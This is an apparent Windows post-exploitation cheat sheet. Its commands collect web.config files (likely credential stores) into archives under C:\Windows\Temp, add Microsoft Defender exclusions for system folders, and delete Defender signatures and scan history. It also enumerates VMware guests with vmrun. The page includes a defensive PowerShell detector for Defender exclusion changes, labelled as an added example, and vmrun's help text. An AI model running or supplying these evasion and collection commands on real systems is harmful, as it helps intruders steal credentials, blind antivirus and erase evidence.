Windows Post-Exploitation
File discovery and retrieval
Get-ChildItem -Path E:\ -Filter Web.Config -Recurse -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName
Compress-Archive -Path (Get-ChildItem -Path "E:\" -Filter "Web.Config" -Recurse -ErrorAction SilentlyContinue).FullName -DestinationPath "C:\Windows\Temp\webconfigs.zip"
Get-ChildItem -Path "E:\" -Filter "web.config" -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName.Substring(3) } | Set-Content "C:\Windows\Temp\webconfigs.txt" -Encoding utf8
# Switch to cmd
C:\Windows\Temp\7zr.exe a -t7z "C:\Windows\Temp\webconfigs.7z" -scsUTF-8 @"C:\Windows\Temp\webconfigs.txt"
Internet Information Services (IIS)
List website directories
c:\windows\system32\inetsrv\appcmd list vdir
Microsoft Defender
Query exclusions
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionProcess, ExclusionExtension
Add exclusions
Add-MpPreference -ExclusionPath "D:\MySafeFolder"
Add-MpPreference -ExclusionPath "C:\Windows\Temp"
Add-MpPreference -ExclusionPath "C:\Windows\System32"
Add-MpPreference -ExclusionPath "C:\Users\Public\Libraries"
Remove exclusions
Remove-MpPreference -ExclusionPath "C:\Windows\Temp"
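A defender-side check for the exclusion changes above, as an added example that is not part of the original page: it parses Microsoft Defender event ID 5007 (configuration changed) messages and flags newly added path exclusions that sit under system or shared directories. The sample messages are constructed, and the function name Find-RiskyDefenderExclusion and the $SensitivePrefixes list are assumptions made for this illustration.

```powershell
# Added example (not from the original page). Find-RiskyDefenderExclusion and
# $SensitivePrefixes are hypothetical names chosen for this illustration.
$SensitivePrefixes = @('C:\Windows', 'C:\Users\Public', 'C:\ProgramData')

function Find-RiskyDefenderExclusion {
    param(
        [Parameter(Mandatory)] [string[]] $Message,   # message text of 5007 events
        [string[]] $Prefix = $SensitivePrefixes
    )
    # A 5007 message records the changed registry value, for example:
    #   New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\<path> = 0x0
    # Requiring "New value:" keeps additions and skips removals (value only in "Old value:").
    $pattern = 'New value:\s*HKLM\\SOFTWARE\\(?:Policies\\)?Microsoft\\Windows Defender' +
               '\\Exclusions\\(Paths|Processes|Extensions)\\(.+?)\s*=\s*0x0'
    foreach ($m in $Message) {
        foreach ($hit in [regex]::Matches($m, $pattern, 'IgnoreCase')) {
            $kind  = $hit.Groups[1].Value
            $value = $hit.Groups[2].Value.TrimEnd('\')
            # Flag path exclusions equal to, or nested under, a sensitive prefix.
            $risky = $false
            if ($kind -eq 'Paths') {
                foreach ($p in $Prefix) {
                    if ($value -ieq $p -or
                        $value.StartsWith("$p\", [StringComparison]::OrdinalIgnoreCase)) {
                        $risky = $true
                    }
                }
            }
            [pscustomobject]@{ Kind = $kind; Value = $value; Risky = $risky }
        }
    }
}

# Constructed sample messages. On a live host, feed the real events instead:
#   (Get-WinEvent -FilterHashtable @{
#       LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007 }).Message
$prefixText = "Microsoft Defender Antivirus Configuration has changed.`n`tOld value: `n`tNew value: "
$keyText    = 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\'
$sample = @(
    ($prefixText + $keyText + 'C:\Windows\Temp = 0x0'),
    ($prefixText + $keyText + 'D:\Build\Cache = 0x0')
)

Find-RiskyDefenderExclusion -Message $sample | Format-Table -AutoSize
```

Rows with Risky set to True are the ones to triage first; the same function can be run over the output of Get-MpPreference by wrapping each ExclusionPath in the registry-value form shown in the comment.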
Query threat intelligence
Get-MpThreatDetection
Delete threat intelligence
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDynamicSignature
# PowerShell
Remove-Item "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\*" -Recurse -Force
VMware Workstation
"C:\Program Files (x86)\VMware\VMware Player\vmrun.exe"
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe"
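Enumerate all running virtual machines
Note that the command used for this query must run with the same privileges as the user running the virtual machines; privileges that are either too high or too low will result in no virtual machines being found.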
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" list
Enumerate all virtual machine network adapters
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" listHostNetworks
Get the virtual machine's network adapter address
"C:\Program Files (x86)\VMware\VMware Workstation\vmrun.exe" -T ws getGuestIPAddress "E:\WIN11E TS - TPE NEW GRM 09\WIN11E TS - TPE.vmx" -wait
Create a snapshot
"C:\Program Files (x86)\VMware\VMware Player\vmrun.exe" -T ws snapshot "C:\VM\WinServer_2012R2\Windows Server 2012.vmx" 2025-07-11
Tool reference
vmrun
vmrun version 1.17.0 build-20800274
Usage: vmrun [AUTHENTICATION-FLAGS] COMMAND [PARAMETERS]
AUTHENTICATION-FLAGS
--------------------
These must appear before the command and any command parameters.
-T <hostType> (ws|fusion||player)
-vp <password for encrypted virtual machine>
-gu <userName in guest OS>
-gp <password in guest OS>
POWER COMMANDS PARAMETERS DESCRIPTION
-------------- ---------- -----------
start Path to vmx file Start a VM or Team
[gui|nogui]
stop Path to vmx file Stop a VM or Team
[hard|soft]
reset Path to vmx file Reset a VM or Team
[hard|soft]
suspend Path to vmx file Suspend a VM or Team
[hard|soft]
pause Path to vmx file Pause a VM
unpause Path to vmx file Unpause a VM
SNAPSHOT COMMANDS PARAMETERS DESCRIPTION
----------------- ---------- -----------
listSnapshots Path to vmx file List all snapshots in a VM
[showTree]
snapshot Path to vmx file Create a snapshot of a VM
Snapshot name
deleteSnapshot Path to vmx file Remove a snapshot from a VM
Snapshot name
[andDeleteChildren]
revertToSnapshot Path to vmx file Set VM state to a snapshot
Snapshot name
HOST NETWORK COMMANDS PARAMETERS DESCRIPTION
--------------------- ---------- -----------
listHostNetworks List all networks in the host
listPortForwardings Host network name List all available port forwardings on a host network
setPortForwarding Host network name Add or update a port forwarding on a host network
Protocol
Host port
Guest ip
Guest port
[Description]
deletePortForwarding Host network name Delete a port forwarding on a host network
Protocol
Host port
GUEST OS COMMANDS PARAMETERS DESCRIPTION
----------------- ---------- -----------
runProgramInGuest Path to vmx file Run a program in Guest OS
[-noWait]
[-activeWindow]
[-interactive]
Complete-Path-To-Program
[Program arguments]
fileExistsInGuest Path to vmx file Check if a file exists in Guest OS
Path to file in guest
directoryExistsInGuest Path to vmx file Check if a directory exists in Guest OS
Path to directory in guest
setSharedFolderState Path to vmx file Modify a Host-Guest shared folder
Share name
Host path
writable | readonly
addSharedFolder Path to vmx file Add a Host-Guest shared folder
Share name
New host path
removeSharedFolder Path to vmx file Remove a Host-Guest shared folder
Share name
enableSharedFolders Path to vmx file Enable shared folders in Guest
[runtime]
disableSharedFolders Path to vmx file Disable shared folders in Guest
[runtime]
listProcessesInGuest Path to vmx file List running processes in Guest OS
killProcessInGuest Path to vmx file Kill a process in Guest OS
process id
runScriptInGuest Path to vmx file Run a script in Guest OS
[-noWait]
[-activeWindow]
[-interactive]
Interpreter path
Script text
deleteFileInGuest Path to vmx file Delete a file in Guest OS
Path in guest
createDirectoryInGuest Path to vmx file Create a directory in Guest OS
Directory path in guest
deleteDirectoryInGuest Path to vmx file Delete a directory in Guest OS
Directory path in guest
CreateTempfileInGuest Path to vmx file Create a temporary file in Guest OS
listDirectoryInGuest Path to vmx file List a directory in Guest OS
Directory path in guest
CopyFileFromHostToGuest Path to vmx file Copy a file from host OS to guest OS
Path on host
Path in guest
CopyFileFromGuestToHost Path to vmx file Copy a file from guest OS to host OS
Path in guest
Path on host
renameFileInGuest Path to vmx file Rename a file in Guest OS
Original name
New name
typeKeystrokesInGuest Path to vmx file Type Keystrokes in Guest OS
keystroke string
connectNamedDevice Path to vmx file Connect the named device in the Guest OS
device name
disconnectNamedDevice Path to vmx file Disconnect the named device in the Guest OS
device name
captureScreen Path to vmx file Capture the screen of the VM to a local file
Path on host
writeVariable Path to vmx file Write a variable in the VM state
[runtimeConfig|guestEnv|guestVar]
variable name
variable value
readVariable Path to vmx file Read a variable in the VM state
[runtimeConfig|guestEnv|guestVar]
variable name
getGuestIPAddress Path to vmx file Gets the IP address of the guest
[-wait]
GENERAL COMMANDS PARAMETERS DESCRIPTION
---------------- ---------- -----------
list List all running VMs
upgradevm Path to vmx file Upgrade VM file format, virtual hw
installTools Path to vmx file Install Tools in Guest
checkToolsState Path to vmx file Check the current Tools state
deleteVM Path to vmx file Delete a VM
clone Path to vmx file Create a copy of the VM
Path to destination vmx file
full|linked
[-snapshot=Snapshot Name]
[-cloneName=Name]
Template VM COMMANDS PARAMETERS DESCRIPTION
--------------------- ---------- -----------
downloadPhotonVM Path for new VM Download Photon VM
Examples:
Starting a virtual machine with Workstation on a Windows host
vmrun -T ws start "c:\my VMs\myVM.vmx"
Running a program in a virtual machine with Workstation on a Windows host with Windows guest
vmrun -T ws -gu guestUser -gp guestPassword runProgramInGuest "c:\my VMs\myVM.vmx" "c:\Program Files\myProgram.exe"
Creating a snapshot of a virtual machine with Workstation on a Windows host
vmrun -T ws snapshot "c:\my VMs\myVM.vmx" mySnapshot
Reverting to a snapshot with Workstation on a Windows host
vmrun -T ws revertToSnapshot "c:\my VMs\myVM.vmx" mySnapshot
Deleting a snapshot with Workstation on a Windows host
vmrun -T ws deleteSnapshot "c:\my VMs\myVM.vmx" mySnapshot
Enabling Shared Folders with Workstation on a Windows host
vmrun -T ws enableSharedFolders "c:\my VMs\myVM.vmx"